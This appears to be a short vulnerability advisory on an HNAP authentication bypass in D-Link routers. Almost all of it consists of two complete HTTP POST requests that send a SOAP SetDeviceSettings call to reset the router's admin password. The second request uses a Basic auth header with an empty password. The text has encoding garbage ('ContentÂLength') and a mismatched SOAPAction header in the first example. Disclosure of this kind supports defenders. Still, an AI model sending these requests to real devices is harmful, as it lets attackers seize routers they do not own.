D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability

D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability

An attacker can exploit this issue by using readily available network utilities.

The following example requests are available:

Example 1:

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:8099
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
ContentÂLength: 453
<?xml version="1.0" encoding="utfÂ8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchemaÂinstance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>

Example 2:

POST /HNAP1/ HTTP/1.1
Authorization: Basic dXNlcjo=
Host: 192.168.0.1
SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
ContentÂLength: 453
<?xml version="1.0" encoding="utfÂ8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchemaÂinstance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>